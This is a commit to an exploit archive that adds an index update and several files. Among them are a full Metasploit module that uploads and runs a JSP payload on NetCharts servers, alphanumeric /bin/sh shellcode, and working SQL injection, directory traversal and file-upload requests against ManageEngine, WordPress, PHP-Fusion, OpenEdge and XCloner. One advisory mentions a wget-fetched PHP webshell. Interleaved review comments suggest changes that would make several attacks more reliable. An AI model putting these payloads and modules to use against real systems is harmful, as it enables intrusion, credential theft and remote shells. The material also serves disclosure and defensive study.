Updated 11_12_2014

Offensive Security 2014-11-12 04:43:24 +00:00
parent 21a8d11767
commit 73654ec124
12 changed files with 1093 additions and 6 deletions


@ -31623,6 +31623,7 @@ id,file,description,date,author,platform,type,port
35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0 35101,platforms/windows/local/35101.rb,"Windows TrackPopupMenu Win32k NULL Pointer Dereference",2014-10-28,metasploit,windows,local,0
35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80 35102,platforms/php/webapps/35102.py,"vBulletin Tapatalk - Blind SQL Injection",2014-10-28,tintinweb,php,webapps,80
35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0 35103,platforms/hardware/remote/35103.txt,"Konke Smart Plug K - Authentication Bypass Vulnerability",2014-10-29,gamehacker,hardware,remote,0
35105,platforms/windows/dos/35105.pl,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) Buffer Overflow/DoS EIP Overwrite",2014-10-29,"ZoRLu Bugrahan",windows,dos,0
35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross Site Scripting Vulnerability",2010-12-11,MustLive,php,webapps,0
35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS Multiple Cross Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0
35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB <= 1.4.10 'tags.php' Cross Site Scripting Vulnerability",2010-12-12,TEAMELITE,php,webapps,0
@ -31699,3 +31700,12 @@ id,file,description,date,author,platform,type,port
35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0 35190,platforms/windows/remote/35190.html,"Newv SmartClient 1.1.0 'NewvCommon.ocx' ActiveX Control Multiple Vulnerabilities",2011-01-10,wsn1983,windows,remote,0
35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0 35191,platforms/php/webapps/35191.txt,"CMS Tovar 'tovar.php' SQL Injection Vulnerability",2011-01-11,jos_ali_joe,php,webapps,0
35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0 35203,platforms/hardware/webapps/35203.txt,"ZTE ZXDSL 831CII - Insecure Direct Object Reference",2014-11-10,"Paulos Yibelo",hardware,webapps,0
35204,platforms/php/webapps/35204.txt,"Another Wordpress Classifieds Plugin - SQL Injection",2014-11-10,dill,php,webapps,0
35205,platforms/linux/shellcode/35205.txt,"Position independent & Alphanumeric 64-bit execve(""/bin/sh\0"",NULL,NULL); (87 bytes)",2014-11-10,Breaking.Technology,linux,shellcode,0
35206,platforms/php/webapps/35206.txt,"PHP-Fusion 7.02.07 - SQL Injection",2014-11-10,"Mauricio Correa",php,webapps,0
35207,platforms/php/webapps/35207.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-11-10,"Mauricio Correa",php,webapps,0
35209,platforms/jsp/webapps/35209.txt,"ManageEngine OpManager, Social IT Plus and IT360 - Multiple Vulnerabilities",2014-11-10,"Pedro Ribeiro",jsp,webapps,0
35210,platforms/multiple/webapps/35210.txt,"Password Manager Pro / Pro MSP - Blind SQL Injection",2014-11-10,"Pedro Ribeiro",multiple,webapps,0
35211,platforms/java/remote/35211.rb,"Visual Mining NetCharts Server Remote Code Execution",2014-11-10,metasploit,java,remote,8001
35212,platforms/php/webapps/35212.txt,"XCloner Wordpress/Joomla! Plugin - Multiple Vulnerabilities",2014-11-10,"Larry W. Cashdollar",php,webapps,80
35213,platforms/windows/remote/35213.html,"Internet Explorer 8 MS14-035 Use-After-Free Exploit",2014-11-10,"Ayman Sagy",windows,remote,0


132
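--- a/platforms/java/remote/35211.rb
+++ b/platforms/java/remote/35211.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'msf/core'
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::FileDropper
+DEFAULT_USERNAME = 'Scheduler'
+DEFAULT_PASSWORD = '!@#$scheduler$#@!'
+SIGNATURE = 'was uploaded successfully and is now ready for installation'
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Visual Mining NetCharts Server Remote Code Execution',
+'Description' => %q{
+This module exploits multiple vulnerabilities in Visual Mining NetCharts.
+First, a lack of input validation in the administration console permits
+arbitrary jsp code upload to locations accessible later through the web
+service. Authentication is typically required, however a 'hidden' user is
+available by default (and non editable). This user, named 'Scheduler',
+can only login to the console after any modification in the user
+database (a user is added, admin password is changed etc). If the
+'Scheduler' user isn't available valid credentials must be supplied. The
+default Admin password is Admin.
+},
+'Author' =>
+[
+'sghctoma', # Vulnerability Discovery
+'juan vazquez' # Metasploit module
+],
+'License' => MSF_LICENSE,
+'References' =>
+[
+['CVE', '2014-8516'],
+['ZDI', '14-372']
+],
+'Privileged' => true,
+'Platform' => %w{ linux win },
+'Arch' => ARCH_JAVA,
+'Targets' =>
+[
+['Visual Mining NetCharts Server 7.0', {}]
+],
+'DefaultTarget' => 0,
+'DisclosureDate' => 'Nov 03 2014'))
+register_options(
+[
+Opt::RPORT(8001),
+OptString.new('USERNAME', [false, "The username to authenticate with"]),
+OptString.new('PASSWORD', [false, "The password to authenticate with"])
+], self.class)
+end
+def check
+res = send_request_cgi({
+'method' => 'GET',
+'uri' => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'),
+'vars_get' => { 'mode' => 'getZip' },
+'authorization' => basic_auth(username, password)
+})
+if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
+Exploit::CheckCode::Detected
+else
+Exploit::CheckCode::Safe
+end
+end
+def exploit
+jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
+print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
+if upload(jsp_payload, payload.encoded)
+print_good("#{peer} - JSP payload uploaded successfully")
+register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}")
+else
+fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
+end
+print_status("#{peer} - Executing payload...")
+execute(jsp_payload, 1)
+end
+def execute(jsp_name, time_out = 20)
+res = send_request_cgi({
+'uri' => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name),
+'method' => 'GET',
+'authorization' => basic_auth(username, password)
+}, time_out)
+res
+end
+def upload(file_name, contents)
+post_data = Rex::MIME::Message.new
+post_data.add_part(
+contents,
+'application/octet-stream',
+nil,
+"form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\""
+)
+res = send_request_cgi({
+'uri' => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'),
+'method' => 'GET',
+'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+'data' => post_data.to_s,
+'vars_get' => { 'mode' => 'getZip' },
+'authorization' => basic_auth(username, password)
+})
+if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)
+true
+else
+false
+end
+end
+def username
+datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME']
+end
+def password
+datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD']
+end
+end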
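Review bot: `check` and `upload` treat any response that lacks SIGNATURE as "not vulnerable", so a 401/403 caused by the hidden `Scheduler` account not being usable yet (the description itself says it only works after the user database has been modified) is reported as `Safe` instead of "supply credentials". Add `return Exploit::CheckCode::Unknown if res && [401, 403].include?(res.code)` before the signature test in `check`, and in `upload` fail with `Failure::NoAccess` on the same condition so the operator knows to set USERNAME/PASSWORD. The response test `res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE)` is duplicated in both methods; a private `upload_succeeded?(res)` helper keeps them in step, and `upload` can then return that expression directly instead of the `if … true else false end`. The NUL byte appended to the multipart filename (`\x00Archive0101140101.zip`) is presumably the extension-check bypass and deserves a one-line comment saying so, since it is the part a future maintainer is most likely to "clean up".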

107
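--- a/platforms/jsp/webapps/35209.txt
+++ b/platforms/jsp/webapps/35209.txt
@@ -0,0 +1,107 @@
+>> Multiple vulnerabilities in ManageEngine OpManager, Social IT Plus and IT360
+>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
+==========================================================================
+Disclosure: 27/09/2014 (#1 and #2), 09/11/2014 (#3 and #4) / Last
+updated: 09/11/2014
+>> Background on the affected products:
+"ManageEngine OpManager is a network and data center infrastructure
+management software that helps large enterprises, service providers
+and SMEs manage their data centers and IT infrastructure efficiently
+and cost effectively. Automated workflows, intelligent alerting
+engines, configurable discovery rules, and extendable templates enable
+IT teams to setup a 24x7 monitoring system within hours of
+installation."
+"Social IT Plus offers a cascading wall that helps IT folks to start
+discussions, share articles and videos easily and quickly. Other team
+members can access it and post comments and likes on the fly."
+"Managing mission critical business applications is now made easy
+through ManageEngine IT360. With agentless monitoring methodology,
+monitor your applications, servers and databases with ease. Agentless
+monitoring of your business applications enables you high ROI and low
+TOC. With integrated network monitoring and bandwidth utilization,
+quickly troubleshoot any performance related issue with your network
+and assign issues automatically with ITIL based ServiceDesk
+integration."
+>> Technical details:
+(#1 and #2 were previously released in September, see [2])
+#3
+Vulnerability: Remote code execution via file upload (unauthenticated
+on OpManager and Social IT)
+CVE-2014-7866
+Constraints: no authentication needed for OpManager and Social IT;
+authenticated in IT360
+a)
+POST /servlet/MigrateLEEData?fileName=../tomcat/webapps/warfile.war%00
+<... WAR file payload ...>
+Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4;
+IT360 10.3/10.4; Social IT 11.0
+b)
+POST /servlet/MigrateCentralData?operation=downloadFileFromProbe&zipFileName=../tomcat/webapps/warfile.war%00
+<... WAR file payload ...>
+Affected versions: Unknown, at least OpManager v8 build 88XX to 11.4;
+IT360 10.3/10.4; Social IT 11.0
+#4
+Vulnerability: Blind SQL injection (unauthenticated)
+CVE-2014-7868
+Constraints: no authentication needed for OpManager and Social IT;
+authenticated in IT360
+a)
+POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=[SQLi]
+POST /servlet/APMBVHandler?OPERATION_TYPE=Delete&OPM_BVNAME=aaa'%3bcreate+table+pulicia+(bolas+text)%3b--+
+Affected versions: Unknown, at least the current versions (OpManager
+11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
+b)
+POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=[SQLi]
+--> runs direct query in db!
+POST /servlet/DataComparisonServlet?operation=compare&numPrimaryKey=1337&query=create+table+panicia+(bolos+text)
+Affected versions: Unknown, at least the current versions (OpManager
+11.3/11.4; IT360 10.3/10.4; Social IT 11.0)
+>> Fix:
+Upgrade to OpManager 11.3 or 11.4, then install patches [B] and [C].
+This patch can be applied to all the applications but only for the
+latest version of each (OpManager 11.3/11.4, Social IT 11.0, IT360
+10.4).
+The fix will be included in OpManager version 11.5 which should be
+released sometime in late November or December 2014. No indication was
+given for when fixed versions of IT360 and Social IT Plus will be
+released.
+[B] https://support.zoho.com/portal/manageengine/helpcenter/articles/sql-injection-vulnerability-fix
+Resolves #3
+[C] https://support.zoho.com/portal/manageengine/helpcenter/articles/fix-for-remote-code-execution-via-file-upload-vulnerability
+Resolves #4
+[1]
+http://seclists.org/fulldisclosure/2014/Aug/55
+http://seclists.org/fulldisclosure/2014/Aug/75
+http://seclists.org/fulldisclosure/2014/Aug/88
+http://seclists.org/fulldisclosure/2014/Sep/1
+http://seclists.org/fulldisclosure/2014/Sep/110
+http://seclists.org/fulldisclosure/2014/Nov/12
+http://seclists.org/fulldisclosure/2014/Nov/18
+[2]
+http://seclists.org/fulldisclosure/2014/Sep/110
+[3]
+https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt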
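Review bot: The patch references at the end of the file are cross-labelled: [B] points at the `sql-injection-vulnerability-fix` article but is marked `Resolves #3` (the file-upload RCE), while [C] is the `fix-for-remote-code-execution-via-file-upload-vulnerability` article marked `Resolves #4` (the blind SQLi). Swap the two labels so [B] reads `Resolves #4` and [C] reads `Resolves #3`; otherwise an operator applying only the patch for the issue they care about installs the wrong one. Both RCE requests also rely on a trailing `%00` after `.war` to cut the rest of the server-side path, which presumably only works on JVM/OS combinations where the NUL truncates the filename — that dependency is worth one sentence under Constraints so a failed test is not mistaken for a patched host.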


@ -0,0 +1,129 @@
#Title: Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
#Author: Breaking.Technology
#Date: 06 November 2014
#Vendor Homepage: http://breaking.technology
#Version: x86-64 platforms
#Classification: 64 bit shellcode
#Shellcode: http://breaking.technology/shellcode/alpha64-binsh.txt
# Position independent & Alphanumeric 64-bit execve("/bin/sh\0",NULL,NULL); (87 bytes)
# This shellcode will successfully execute every time as long as it is returned to.
# (c) 2014 Breaking Technology, Inc.
# http://breaking.technology/
#
# Assembled (87 bytes):
# XXj0TYX45Pk13VX40473At1At1qu1qv1qwHcyt14yH34yhj5XVX1FK1FSH3FOPTj0X40PP4u4NZ4jWSEW18EF0V
#
# Assembly:
# user@host $ as alpha64-binsh.s -o alpha64-binsh.o ; strings alpha64-binsh.o
.section .data
.section .text
.globl _start
_start: # "XX"
pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer
pop %rax # 'X' add $0x8, %rsp ; so we dont overwrite the return pointer
prepare_ff: # "j0TYX45Pk13"
push $0x30 # 'j0'
push %rsp # 'T'
pop %rcx # 'Y' %rcx points to $0x30
pop %rax # 'X' %rax = 0x30
xor $0x35, %al # '45' %rax = 0x05
push %rax # 'P' (%rcx) = 0x05
imul $0x33, (%rcx), %esi # 'k13' %esi = 0x000000ff
prepare_f8: # "VX4047"
# mov %rsi, %rax
push %rsi # 'V'
pop %rax # 'X' %rax = %rsi = 0x000000ff
# mov $0xf8, %al
xor $0x30, %al # '40'
xor $0x37, %al # '47' %rax = 0x000000f8
write_negative_8: # "3At1At1qu1qv1qw"
# mov %eax, 0x74(%rcx)
xor 0x74(%rcx), %eax # '3At'
xor %eax, 0x74(%rcx) # '1At' 0xf8
# mov %sil, 0x75 - 0x77 + rcx
xor %esi, 0x75(%rcx) # '1qu' 0xff
xor %esi, 0x76(%rcx) # '1qv' 0xff
xor %esi, 0x77(%rcx) # '1qw' 0xff
# -8 is now on the stack as a 32-bit dword
# at 0x74(%rcx)
read_negative_8: # "Hcyt"
# move long (dword) to signed quadword
# mov -8, %rdi
movslq 0x74(%rcx), %rdi # 'Hcyt' %rdi is now -0x8 ( 0xfffffffffffffff8 )
get_return_pointer: # "14yH34y"
# mov -0x10(%rcx), %rsi <--- THIS IS OUR RETURN POINTER / LOCATION OF short_pc_rsi
# OR IN DECIMAL:
# mov -16(%rcx), %rsi
xor %esi, (%rcx, %rdi, 2) # '14y'
xor (%rcx, %rdi, 2), %rsi # 'H34y'
prepare_key: # "hj5XVX"
# put the xor key into %eax
push $0x5658356a # 'hj5XV' pushed backwards because x86 stack.
pop %rax # 'X'
decode_encoded_code: # "1FK"
xor %eax, 0x4b(%rsi) # '1FK' encoded_code ; pops & syscall decoded
decode_encoded_data: # "1FSH3FO"
xor %eax, 0x53(%rsi) # '1FS' encoded_data + 4 ; "/sh\0" decoded
xor 0x4f(%rsi), %rax # 'H3FO' encoded_data ; "/bin/sh\0" now in %rax
begin_stack_setup: # "PT"
push %rax # 'P' push "/bin/sh\0"
push %rsp # 'T' push pointer to /bin/sh
zero_rax: # "j0X40"
# xor %rax, %rax
push $0x30 # 'j0'
pop %rax # 'X'
xor $0x30, %al # '40' %rax is NULL
end_stack_setup: # "PP"
push %rax # 'P' push NULL
push %rax # 'P' push NULL
mov_3b_al: # "4u4N"
# mov $0x3b, %al
xor $0x75, %al # '4u'
xor $0x4e, %al # '4N' %al = 0x4e xor 0x75 = $0x3b
# this is for syscall ^
begin_stack_run: # "Z"
pop %rdx # 'Z' mov $0x00, %rdx ; %rdx = NULL
encoded_code: # "4jWS"
# 0x34 0x6a 0x57 0x53
# AFTER XOR MAGIC:
.byte 0x34 # "\x5e" pop %rsi ; %rsi = NULL
.byte 0x6a # "\x5f" pop %rdi ; %rdi = pointer to "/bin/sh\0"
.byte 0x57 # "\x0f"
.byte 0x53 # "\x05" syscall ; execve("/bin/sh\0",NULL,NULL);
# syscall(%rax) = function(%rdi,%rsi,%rdx);
# syscall(0x3b) = execve("/bin/sh\0",NULL,NULL);
encoded_data: # "EW18EF0V" turns into "/bin/sh\0"
# 0x45 0x57 0x31 0x38 0x45 0x46 0x30 0x56
# AFTER XOR MAGIC:
.byte 0x45 # /
.byte 0x57 # b
.byte 0x31 # i
.byte 0x38 # n
.byte 0x45 # /
.byte 0x46 # s
.byte 0x30 # h
.byte 0x56 # \0
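Review bot: The decode steps `xor %eax, 0x4b(%rsi)` and `xor %eax, 0x53(%rsi)` rewrite the shellcode's own bytes at `encoded_code` and `encoded_data`, so this only runs from a page that is both writable and executable; a test harness must place it in RWX memory (for example an `mmap` with `PROT_READ|PROT_WRITE|PROT_EXEC`), and on a W^X-enforcing target the decoder faults before `syscall` is ever reached. A one-line header note such as `# self-modifying: the shellcode page must be writable as well as executable (RWX)` would save the next user a puzzling SIGSEGV. "Position independent" here is also relative to the return address that `get_return_pointer` reads from `-0x10(%rcx)`, i.e. the stack as it looks at entry after the two `pop %rax`, which is why the header says it works "as long as it is returned to" — it is not usable via a direct `jmp`/`call` unless that stack slot already holds a pointer to the code.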


@ -0,0 +1,65 @@
>> Authenticated blind SQL injection in Password Manager Pro / Pro MSP
>> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security
==========================================================================
Disclosure: 08/11/2014 / Last updated: 08/11/2014
>> Background on the affected products:
"Password Manager Pro (PMP) is a secure vault for storing and managing
shared sensitive information such as passwords, documents and digital
identities of enterprises."
>> Technical details:
PMP has a SQL injection vulnerability in its search function. A valid
user account is required to exploit the injection, however a low
privileged guest account is enough.
The application uses different database backends by default depending
on its version: versions < 6.8 use the MySQL backend and versions >=
6.8 use PostgreSQL. Single quotes are escaped with backslashes at the
injection point, but this can be somewhat avoided by double escaping
the slashes (\\'). In addition, injected strings are all modified to
uppercase. These two unintended "protections" make it difficult to
exploit the injection to achieve remote code execution.
However the injection can be abused in creative ways - for example to
escalate the current user privileges to "Super Administrator", which
has access to all the passwords in the system in unencrypted format.
This can be achieved by injecting the following queries: "update
AaaAuthorizedRole set role_id=1 where account_id=<userId>;insert into
ptrx_superadmin values (<userId>,true);".
A Metasploit module has been released that creates a new "Super
Administrator" account and exports PMP's password database in CSV
format. All passwords are exported unencrypted.
Vulnerability: Blind SQL injection in SEARCH_ALL parameter (multiple
pages affected)
Constraints: authentication needed (guest / low privileged user account)
CVE-2014-8498
POST /BulkEditSearchResult.cc
Affected versions: Unknown, at least v7 build 7001 to vX build XXX
CVE-2014-8499
POST /SQLAdvancedALSearchResult.cc
POST /AdvancedSearchResult.cc
Affected versions: Unknown, at least v6.5 to vX build XXX
COUNT=1&USERID=1&SEARCH_ALL=<injection here>
>> Fix:
Upgrade to version 7.1 build 7105
[1]
http://seclists.org/fulldisclosure/2014/Aug/55
http://seclists.org/fulldisclosure/2014/Aug/75
http://seclists.org/fulldisclosure/2014/Aug/88
http://seclists.org/fulldisclosure/2014/Sep/1
http://seclists.org/fulldisclosure/2014/Sep/110
http://seclists.org/fulldisclosure/2014/Nov/12
[2]
https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt

41
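--- a/platforms/php/webapps/35204.txt
+++ b/platforms/php/webapps/35204.txt
@@ -0,0 +1,41 @@
+Exploit Title: Another Wordpress Classifieds Plugin sql injection and Cross Site Scripting
+Author: dill
+download: https://wordpress.org/plugins/another-wordpress-classifieds-plugin/Client
+Webpage: http://awpcp.com/
+SQL injection
+Details:
+The parameter “keywordphrase” is susceptible to a time-based blind SQL injection when doing a search for classifieds.
+Proof-of-Concept (PoC)
+Request:
+POST /?page_id=16592 HTTP/1.1
+Host: vulnerable.server
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Referer: http://vulnerable.server/?page_id=16592
+Cookie: wp-settings-1=libraryContent%3Dbrowse%26editor%3Dhtml; wp-settings-time-1=1407957654; wp-settings-time-2=1408136814; PHPSESSID=uk871e0cssdnca8oesorbmg2b6
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 371
+a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=state®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=city®ions[0][city]=city
+Exploit through sqlmap:
+Copy post request to text file
+sqlmap -r keywordphrase.txt -p keywordphrase --dbms=MySQL --level=5
+-----------------
+Place: POST
+Parameter: keywordphrase
+Type: AND/OR time-based blind
+Title: MySQL > 5.0.11 AND time-based blind
+Payload: a=dosearch&keywordphrase=k'||(SELECT 'ICab' FROM DUAL WHERE 6152=6152 AND SLEEP(5))||'&searchcategory=&searchname=&searchpricemin=1&searchpricemax=2&select-country0.2917955784677633=&textfield-country0.2917955784677633=country®ions[0][country]=country&select-state0.3360776012424508=&textfield-state0.3360776012424508=State®ions[0][state]=State&select-city0.8672109586380441=&textfield-city0.8672109586380441=City®ions[0][city]=City
+Resolution: Developer was contacted and has since corrected the issues. Update to the latest version of the plugin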
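Review bot: The PoC request body (the `a=dosearch&keywordphrase=` line) and the sqlmap `Payload:` line have been mangled in transit: every `&regions[...]` parameter is printed as `®ions[...]` because the `&reg` prefix was decoded as the ® entity, so the request as published does not carry the form's `regions` parameters and will not reproduce. Restore `&regions[0][country]=country`, `&regions[0][state]=State` and `&regions[0][city]=city` in both places (and re-check the `Content-Length: 371` once the body is correct). The title also promises Cross Site Scripting, but the body documents only the time-based blind SQL injection in `keywordphrase`; either add the XSS parameter and a PoC or drop it from the title, and "Update to the latest version" should name the first fixed plugin version so the advisory can be acted on.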

55
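--- a/platforms/php/webapps/35206.txt
+++ b/platforms/php/webapps/35206.txt
@@ -0,0 +1,55 @@
+# Exploit Title: PHP-Fusion 7.02.07 SQL Injection
+# Date: 06/11/2014
+# Exploit Author: Mauricio Correa
+# Vendor Homepage: www.php-fusion.co.uk
+# Software Link:
+http://ufpr.dl.sourceforge.net/project/php-fusion/PHP-Fusion%20Archives/7.x/
+PHP-Fusion-7.02.07.zip
+# Version: 7.02.07
+# Tested on: Linux OS (Debian)
+# CVE : CVE-2014-8596
+GET
+/PHP-Fusion/files/administration/submissions.php?action=2&aid=9b23a9871adc75
+cd&submit_id=1[SQL Injection]&t=n HTTP/1.1
+Host: 192.168.0.105
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
+Firefox/33.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie:
+fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
+b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
+session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;
+fusion68fF5_visited=yes; has_js=1;
+Connection: keep-alive
+and
+GET
+/PHP-Fusion/files/administration/members.php?aid=9b23a9871adc75cd&status=4[S
+QL Injection] HTTP/1.1
+Host: 192.168.0.105
+User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101
+Firefox/33.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Cookie:
+fusion68fF5_user=1.1414718441.a8ab620bccfcc51e12da05d5ab81734a44f1cabd25f620
+b17122152bf157283f; fusion68fF5_lastvisit=1414550801;
+session_id_8000=e987f4ac3b66045a9ce1ee9343c9a619dab98eb9;;
+fusion68fF5_visited=yes; has_js=1;
+Connection: keep-alive
+More informations (in Portuguese Br): https://www.xlabs.com.br/blog/?p=282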
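Review bot: Both requests carry an admin `aid=9b23a9871adc75cd` token and a `fusion68fF5_user` session cookie, and the targets live under `administration/` (`submissions.php` via `submit_id`, `members.php` via `status`), so these injections are reachable only by an authenticated administrator; state that precondition next to the CVE line so the severity is not misread as unauthenticated. The `[SQL Injection]` placeholders give neither the injection type (error-, union- or time-based) nor a working payload, and the request lines are hard-wrapped mid-token (`9b23a9871adc75` / `cd&submit_id=`, `status=4[S` / `QL Injection]`) so they cannot be pasted as-is; present each request on one line and add one concrete payload per parameter, e.g. `submit_id=1 AND SLEEP(5)` if the backend is MySQL (hedged — the query context is not shown). The second `Cookie:` block also has a doubled `;;` after the `session_id_8000` value that looks like a copy artifact.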

71
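--- a/platforms/php/webapps/35207.txt
+++ b/platforms/php/webapps/35207.txt
@@ -0,0 +1,71 @@
+# Exploit Title: Progress OpenEdge Directory Traversal
+# Date: 30/10/2014
+# Exploit Author: Mauricio Correa
+# Vendor Homepage: www.progress.com
+# Software Link: www.progress.com/products/openedge
+# Version: 11.2
+# Tested on: Windows OS
+# CVE : CVE-2014-8555
+The malicious user sends a malformed request that generates the file access
+up directories as follows:
+http://target_ip:9090/report/reportViewAction.jsp?selection=..%2f..%2f..%2f.
+.%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
+or else
+http://
+target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../..
+/../../windows/win.ini
+And the application answers
+; for 16-bit app support
+[fonts]
+[extensions]
+[mci extensions]
+[files]
+[Mail]
+MAPI=1
+CMCDLLNAME32=mapi32.dll
+CMC=1
+MAPIX=1
+MAPIXVER=1.0.0.1
+OLEMessaging=1
+More informations (in Br-Portuguese): https://www.xlabs.com.br/blog/?p=256
+Thanks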
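Review bot: Both traversal URLs are hard-wrapped mid-token (`..%2f.` / `.%2f..`, and `http://` / `target_ip:9090/...`), so a copy-paste of either will not reproduce the request; present each as a single line, e.g. `http://target_ip:9090/report/reportViewAction.jsp?selection=../../../../../../../../../../windows/win.ini`. The advisory also does not say whether `/report/reportViewAction.jsp` on port 9090 requires a session — the absence of any `Cookie:` header in the examples suggests it is unauthenticated, but that should be stated explicitly rather than left to inference, and "Tested on: Windows OS" should be paired with a Linux example path (the `selection` parameter presumably traverses the same way there) or an explicit note that only Windows was tested.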

271
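--- a/platforms/php/webapps/35212.txt
+++ b/platforms/php/webapps/35212.txt
@@ -0,0 +1,271 @@
+Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities
+Author: Larry W. Cashdollar, @_larry0
+Date: 10/17/2014
+Download: https://wordpress.org/plugins/xcloner-backup-and-restore/
+Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665
+Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175
+Website: http://www.xcloner.com
+Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/
+Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response.
+CVEID: Requested, TDB.
+OSVDBID:114176,114177,114178,114179,114180
+Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.”
+Vulnerabilities: There are multiple vulnerabilities Ive discovered in this plugin, they are as follows.
+1. Arbitrary command execution.
+2. Clear text MySQL password exposure through html text box under configuration panel.
+3. Database backups exposed to local users due to open file permissions.
+4. Unauthenticated remote access to backup files via easily guessable file names.
+5. Authenticated remote file access.
+6. MySQL password exposed to process table.
+Arbitrary Command Execution
+Plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields.
+PoC
+All input fields I believe are vulnerable, Ive chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data.
+Screenshots available at the advisory URL above.
+All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution.
+$_CONFIG[tarpath]
+$exclude
+$_CONFIG['tarcompress']
+$_CONFIG['filename']
+$_CONFIG['exfile_tar']
+$_CONFIG[sqldump]
+$_CONFIG['mysql_host']
+$_CONFIG['mysql_pass']
+$_CONFIG['mysql_user']
+$database_name
+$sqlfile
+$filename
+Vulnerable code
+./cloner.functions.php:
+1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html");
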